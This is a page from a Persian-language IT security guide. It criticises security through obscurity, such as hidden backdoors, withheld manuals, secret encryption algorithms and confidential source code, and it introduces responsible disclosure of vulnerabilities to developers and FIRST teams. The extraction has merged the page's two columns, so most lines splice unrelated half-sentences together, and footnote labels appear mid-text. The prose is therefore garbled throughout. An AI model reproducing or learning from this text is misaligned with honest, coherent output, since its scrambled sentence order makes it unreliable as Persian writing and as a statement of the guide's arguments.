‫ﻻ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﺏ ﻣﺨﻔﻲ ﻗﺮﺍﺭ‬ ‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻌﻤﻮ ﹰ‬ ‫ﺣﺴﺎﺳﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻳﺎ ﺍﻣﻨﻴﺖ ﺍﺳﺘﻨﺒﺎﻃﻲ‪ ٨٥‬ﺑﺎﻳﺪ ﺑﺮﻗـﺮﺍﺭ ﺑﺎﺷـﺪ‪،‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﺑـﺪﻭﻥ ﺍﺭﺍﺋـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ‪،‬‬ ‫ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺍﺯ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﮔـﺮ ﺳـﻪ ﻗﻄﻌـﺔ‬
‫ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻧﺪ‪ .‬ﮔﺎﻫﻲ ﻧﻴﺰ ﺍﺷﻜﺎﻻﺕ ﺳﻴـﺴﺘﻢ‬ ‫ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺑﺘﻮﺍﻧﻨﺪ ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺨﺮﺏ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻭﺭﻧﺪ‬
‫ﺑﺎ ﻋﻮﺍﺭﺽ ﻋﻤﻴﻖ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻣـﺪﻳﺮ‬ ‫ﻭﻟﻲ ﻫﻴﭽﻜﺲ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﻗﻄﻌﻪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺗﺼﻮﺭ ﻣﻲﻛﻨﺪ ﻛﺴﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﻧﺪﺍﺭﺩ‪ .‬ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ‬ ‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺸﻜﻼﺕ ﻭ‬ ‫ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻔﻬـﻮﻡ "ﻧﻴـﺎﺯ ﺑـﻪ‬
‫ﻭﻳﮋﮔﻴﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻳﺎ ﺑﻮﺳﻴﻠﺔ ﻳـﻚ‬ ‫ﻻ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻮﻳﮋﻩ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ‬ ‫ﺩﺍﻧﺴﺘﻦ" ﻣﻌﻤﻮ ﹰ‬
‫ﻧﻔﻮﺫﮔﺮ ﻣﺼﻤﻢ ﻛﺸﻒ ﺷـﻮﻧﺪ‪ .‬ﻣﺨﻔـﻲ ﻧﮕﻬﺪﺍﺷـﺘﻦ ﺍﺷـﻜﺎﻻﺕ ﻭ‬ ‫ﺻﺪﻕ ﻣﻲﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺑـﺮ ﺍﻳـﻦ ﻣﺒﻨـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﻭﻳﮋﮔﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻣﻮﺭﺩ ﻣﺸﺎﻫﺪﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﻧﺪ ﻭ‬ ‫ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺎﺩﺍﻧﺴﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﺗﻜـﺎ‬
‫ﻃﺒﻴﻌﺘﹰﺎ ﺍﺻﻼﺡﻧﺸﺪﻩ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨـﺪ‪ .‬ﻟـﺬﺍ ﭘـﺲ ﺍﺯ ﺁﻧﻜـﻪ ﻛـﺸﻒ‬ ‫ﺑﻪ ﺟﻬﻞ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻤﻨﻲ ﺷﻤﺎ ﺧﺪﺷﻪ ﻭﺍﺭﺩ ﻛﻨﺪ‪.‬‬
‫ﺷﺪﻧﺪ‪ ،‬ﻭﺟﻮﺩ ﻣﺸﻜﻞ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺗﻤـﺎﻡ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣـﺸﺎﺑﻪ‬
‫ﻧــﺴﺒﺖ ﺑــﻪ ﺣﻤﻠــﺔ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﻣــﺸﻜﻞ ﺭﺍ ﻛــﺸﻒ ﻛــﺮﺩﻩﺍﻧــﺪ‬ ‫ﻣﺤﻴﻄﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺪﻳﺮﻳﺖ ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴـﺮﺩ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﻛﺘﺎﺑﭽﻪ ﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ ﺭﺍ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﻭﺭ ﻧﮕـﻪ ﺩﺍﺭﺩ ﺗـﺎ‬
‫ﺍﺟﺎﺯﻩ ﻧﺪﻫﺪ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺍﻣﻴﻦ ﻭ ﮔﺰﻳﻨﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺎ‬
‫ﻼ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ‬ ‫ﺍﺭﺯﺵ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ ‪ -‬ﻣـﺜ ﹰ‬ ‫ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺧﺪﺷـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩ ﻣﻄﻠﺒـﻲ ﺑﻴﺎﻣﻮﺯﻧـﺪ‪ .‬ﺩﺭ‬
‫ﺍﻧﺤﺼﺎﺭﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ -‬ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ‪ .‬ﺗﺎ ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ‬ ‫ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﻣﺪﻳﺮﺍﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﺑﺎﺷـﻨﺪ ﻛـﻪ‬
‫ﻣﺘﺨﺼﺺ ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ٨٦‬ﻧﺒﺎﺷﻴﺪ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ ﻗـﺪﺭﺕ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺭﺍ‬ ‫ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩﺍﻧﺪ‪ ،‬ﺍﻣـﺎ ﺩﺭ ﻭﺍﻗـﻊ ﺍﻳﻨﻄـﻮﺭ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ‪ .‬ﻧﺘﻴﺠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺍﺭﺍﻱ‬ ‫ﻧﻴﺴﺖ‪ .‬ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺼﻤﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺭﺍ ﺟﺎﻱ ﺩﻳﮕﺮﻱ‬
‫ﻧﻘﺎﻳﺺ ﺟﺪﻱ ﺍﺳﺖ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲ ﺷـﻮﺩ‬ ‫ﭘﻴﺪﺍ ﻛﻨﺪ ‪ -‬ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺍﺩﺍﺭﺍﺕ ﺩﻳﮕﺮ‪ .‬ﻣﻘﺎﺩﻳﺮ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ‬
‫ﻃﺒﻴﻌﺘﹰﺎ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻧﻤـﻲﮔﻴـﺮﺩ ﻭ ﻟـﺬﺍ ﻫـﺮ‬ ‫ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺩﺭ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻤﺘﺮ ﺍﺯ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻛﺘﺎﺑﻔﺮﻭﺷﻲ ﺑﻪ ﻫـﺮ‬
‫ﻛﺴﻲ ﻛﻪ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺁﻥ ﺑﻴﺎﺑﺪ ﺧﻮﺍﻫـﺪ ﺗﻮﺍﻧـﺴﺖ ﺑـﺪﻭﻥ ﺍﻃـﻼﻉ‬ ‫ﺍﺩﺍﺭﻩ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ! ﻣﺪﻳﺮﻳﺖ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﻫﻤﺔ ﺭﺍﻫﻬﺎﻱ ﻳﺎﺩﮔﻴﺮﻱ‬
‫ﺷﻤﺎ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﺘﺎﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬ ‫ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺒﻨﺪﺩ‪ .‬ﺿﻤﻦ ﺍﻳﻨﻜﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ﻳـﺎ‬ ‫ﺩﻟﻴﻞ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﻨﺎﺩ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻛﺎﺭﺁﺗﺮ‬

‫‪86‬‬ ‫‪Cryptography‬‬ ‫‪85‬‬ ‫‪Inferential Security‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٥٦‬‬

‫ﺗﻮﺳﻌﻪﺩﻫﻨـﺪﺓ ﺁﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻃـﻼﻉ ﺩﻫﻴـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺗﻮﺻـﻴﻪ‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻧﻴﺰ ﻫﻴﭻ ﺗـﻀﻤﻴﻨﻲ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ‬
‫ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺁﻧﺮﺍ ﺑﻪ ﺍﻃﻼﻉ ﻳﻜﻲ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ‪) FIRST‬ﻛـﻪ ﺩﺭ‬ ‫ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ‪ .‬ﻛﺴﺎﻧﻴﻜﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ‬
‫ﺿﻤﻴﻤﺔ ‪ ۴‬ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ( ﻧﻴﺰ ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ‬ ‫ﻭﺍﺭﺩ ﺷﻮﻧﺪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨﻨـﺪ؛‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻛﻤﻚ ﻛﻨﻨﺪ ﺗﺎ ﺑـﺮﺍﻱ ﺣﻔـﺮﻩﻫـﺎﻱ‬ ‫ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳﺎ ﻧﺪﺍﺷﺘﻪ‬
‫ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻭﺻﻠﻪﻫﺎﻳﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ‬ ‫ﺑﺎﺷﻨﺪ‪ ٨٧.‬ﺍﻣﺎ ﺑﺪﻭﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ‬
‫ﻭﺻﻠﻪﻫـﺎ ﺗﻮﺯﻳـﻊ ﺷـﺪﻩ ﻭ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬ ‫ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻣﺪﻭﻥ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﺗﺎ ﻣـﺸﻜﻼﺕ ﺁﻧـﺮﺍ ﺑﻴﺎﺑﻨـﺪ؛ ﻭ ﻟـﺬﺍ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬ ‫ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﺰﻳـﺖ‬
‫ﻛﻮﭼﻜﻲ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ‪ ،‬ﺍﻣﺎ ﺍﻣﻨﻴـﺖ ﻧﺒﺎﻳـﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﺨﻔـﻲﺑـﻮﺩﻥ‬
‫ﺍﮔﺮ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺑـﻮﻕ ﻭ ﻛﺮﻧـﺎ ﻛﻨﻴـﺪ‪ ،‬ﺗﻤـﺎﻡ‬
‫ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺍﺷﻜﺎﻻﺕ ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﻨﻨـﺪ ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ ﻛـﺮﺩﻩﺍﻳـﺪ‪ .‬ﺩﺭ ﻣﺤـﻴﻂ‬ ‫ﻧﮕﺮﺵ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻳـﻚ ﻧﻜﺘـﺔ ﻛﻠﻴـﺪﻱ ﺍﺳـﺖ‪ .‬ﺩﺭﺻـﻮﺭﺕ‬
‫‪ Unix‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺻـﻼﺡ‬ ‫ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﺩﻓـﺎﻋﻲ ﻛـﻪ ﺑـﺮ‬
‫ﺍﺷﻜﺎﻻﺕ ﻳﻚ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺩﺭ ﻣﺘﻦ ﺁﻥ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻛﻨﻨﺪ‪.‬‬ ‫ﻣﺒﻨﺎﻱ ﻣﺨﻔﻲﻛﺎﺭﻱ ﺍﺳـﺘﻮﺍﺭﻧﺪ ﻫﻤﮕـﻲ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ‬
‫ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ‪ .‬ﺣﺘﻲ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺗـﺪﺍﻭﻡ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺎﻋـﺚ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻪ ﺍﺯ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺘﻨﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﻳﺎ ﻣﺤﺪﻭﺩ ﺷﺪﻥ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺷـﻮﺩ‬
‫ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎﻳﺪ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺻﺒﺮ ﻛﻨﻨﺪ ﺗـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﻓﻬﻤﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﺍﻳـﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﻣﺮﺑﻮﻃﻪ ﻣﻨﺘﺸﺮ ﺷـﻮﺩ‪ .‬ﺑﻌـﻀﻲ‬
‫ﺍﺩﺍﺭﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ‪ -‬ﺑﺪﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺟﺰ ﺭﻭﺷﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﻭ‬ ‫ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪ .‬ﺑﻮﺳﻴﻠﺔ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ‬
‫ﻛﺎﺭ ﺑﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭ ﺩﻳﮕﺮﻱ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻧﻤـﻲﻛﻨﻨـﺪ ﻭ ﻳـﺎ‬ ‫ﻛﻪ ﺫﺍﺗﹰﺎ ﻣﺴﺘﺤﻜﻢ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩ‪،‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﺷﺎﻥ ﺑﺮ ﺍﺳﺎﺱ ﺗﻨﻈﻴﻤﺎﺕ ﻣﻮﺟﻮﺩ ﮔﻮﺍﻫﻲ ﺩﺭﻳﺎﻓﺖ ﻛـﺮﺩﻩ‬ ‫ﺣﺘﻲ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﻛـﻪ‬
‫ﻭ ﻟﺬﺍ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻧﺮﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻨـﺪ ‪ -‬ﺣﺘـﻲ ﻗـﺎﺩﺭ ﺑـﻪ‬ ‫ﺷﻤﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻛـﻪ ﻫﻤـﻪ ﺍﺯ‬
‫ﺁﻥ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬـﺎﺟﻢ ﺭﺍ ﻧﺎﺍﻣﻴـﺪ ﻛﻨـﺪ ﻭ ﺑﺎﻋـﺚ‬
‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﻫﻢ ﻧﺒﺎﺷﻨﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ‬
‫ﺷﻮﺩ ﺟﺎﻱ ﺩﻳﮕﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ ﺑـﺪﻧﺒﺎﻝ ﻫﻴﺠـﺎﻥ‬
‫ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺭﺍﻫﺒﺮﻱ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻬـﺎﺭﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺍﻋﻤـﺎﻝ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﻧﻔﻮﺫ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺭﺍ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﻱ ﻗﻔـﻞﺩﺍﺭ‬
‫ﻭﺻﻠﻪﻫﺎ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﺍﺯ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻫﻢ ﺍﺳﺘﻔﺎﺩﺓ ﻓﻌﺎﻝ‬
‫ﭘﻨﻬﺎﻥ ﻛﻨﻴﺪ ﺍﻣﻨﻴﺖ ﺁﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻛﺴﻲ ﻧﺪﺍﻧـﺪ ﺍﺯ‬
‫ﻧﺸﻮﺩ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﺣﻴﻄﺔ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﻨﺪ‪ .‬ﻫﻤﻴـﺸﻪ‬
‫ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻳﻚ ﻗﻮﻃﻲ ﺳﺲ ﻣـﺎﻳﻮﻧﺰ ﺩﺭ ﻳﺨﭽـﺎﻝ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻣﺴﺌﻮﻻﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ ﻳﻚ ﻭﺻﻠﻪ ﺭﺍ ﺑﺪﻭﻥ ﺗﻮﺿﻴﺢ ﺩﺭ‬
‫ﻣﻲﻛﻨﻴﺪ!‬
‫ﻣﻮﺭﺩ ﺯﻳﺮﺑﻨﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺮﺑﻮﻃﻪ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ ﺗﻮﺯﻳﻊ ﻛﻨﻴﻢ‪،‬‬
‫ﺗﺎ ﺍﻳﻨﻜﻪ ﺑﺨﻮﺍﻫﻴﻢ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ‬
‫ﺍﻓﺸﺎﻱ ﻣﺴﺌﻮﻻﻧﻪ‬
‫ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺻﻠﻪﻧﺸﺪﻩ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﻴﻢ‪.‬‬
‫ﻣﻘﺼﻮﺩ ﺍﺯ ﺍﻳﺮﺍﺩﻱ ﻛﻪ ﺑﻪ "ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬـﻞ ﻣﻬـﺎﺟﻢ" ﻭﺍﺭﺩ‬
